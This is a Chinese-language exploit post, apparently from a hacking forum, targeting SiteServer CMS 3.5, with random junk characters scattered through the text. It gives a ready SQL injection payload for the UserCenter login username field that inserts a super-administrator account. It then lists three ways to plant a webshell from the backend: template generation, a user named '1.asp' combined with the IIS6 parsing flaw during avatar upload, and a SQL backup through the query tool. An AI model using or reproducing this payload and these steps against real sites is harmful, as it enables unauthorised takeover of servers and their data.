经测试秒杀最新的3.5版
7 R$ P8 M f7 T- c- \' Y! g
* `9 Y" l9 H& o- {. q: z# gstieserver官网:www.siteserver.cn' ^$ v+ a- M- @9 n5 D, e
* p, }0 r# J6 ]# f
" j: R% K/ G2 R/ k/ h1 X/ y. m! j% M: _ L
EXP:
: H: a. y6 R1 `7 G
3 `# s5 k5 i: h; z! ]9 v) G直接访问UserCenter/login.aspx4 U2 G* }: y7 T$ j2 ?1 a
" A" i9 _1 f U* O( T- {$ j! P
3 X O# b2 E/ t1 O
* r( L1 U/ z/ R' K用户名处输入:2 q. W% J: M- G8 ?8 W! V H; k
# l6 a& n. t0 P) b4 \1 I: A123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--9 S5 h6 N& k* G4 S
) k, X) r3 S ~8 P
( o/ x: ]! \$ N: H4 V1 A/ x R2 W0 y& `" L2 W7 }
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
. S- r' F4 J7 B, Y2 A: M3 G) O
# b2 m: b% b! E1 O2 I
0 c! W2 }/ @4 W1 R! g; {. v9 I7 Z& t! Z/ S) B9 t+ e
之后再访问后台SiteServer/login.aspx用插入的用户登陆
" o, x; W" X- ] x' V4 g! I2 S1 p0 K4 b/ h; @5 O, b
: \% Q" B6 ~6 A \* ?
8 n d0 o g" `/ c0 X3 N, i
后台拿webshell的三种方法:
( @# M9 H) B6 o! L- G0 d, V2 }0 I7 x5 U+ \, b+ M( \ A
一、# S5 S3 @8 D' @8 b( z- ^
- l: E' G: H! V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
6 F$ K7 A% l9 ]6 x6 N$ @& \1 }
二、
: L; o, q; [7 ~3 s
5 m) i0 ~2 Q* n+ I2 `成员权限-》添加用户-》用户名为:1.asp
6 g/ q O4 l0 u
8 t. I& j. n! P' D! m( xhttp://127.0.0.1/usercenter/( c0 K- m9 _4 x1 t( F# I3 ^, r3 i
7 m) D: J! |0 C6 L# L Z
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ P. c8 h) k0 ^$ L" Q
: C ^, H t4 V! r( _2 K(ps:后台添加用户时不会验证是否含有非法字符)/ \0 x0 Z- ]9 Q; O: E6 W: x$ A
/ R2 Z; |' [0 C; b三、& L/ Q, J2 x) }. b; P# z. f
& e8 x8 d7 o1 Y9 Z5 _3 T: p3 z
系统工具-》实用工具-》机器参数查看- S1 W ?5 ~3 d5 q/ K4 I* v5 a2 i' |8 R
可以看到数据库类型、名称,WEB路径 Z/ O7 M8 M* U- p# ~- O& ~
: y5 t0 o b5 M" ~, T系统工具-》数据库工具-》SQL语句查询
- O% V$ h4 E) ^( v9 `# H4 Q这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。4 d) v- O: {& \2 L% O* }( v
. k6 z, |$ A ]! \; M7 m
|